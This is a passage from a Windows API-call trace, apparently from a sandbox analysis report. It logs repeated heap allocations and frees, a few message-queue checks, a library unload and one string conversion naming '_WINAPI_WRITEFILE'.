returned 0x9bdac8 [0175.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.217] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.219] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.219] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0175.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0175.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.222] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0175.223] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0175.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0175.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.225] HeapFree (in: 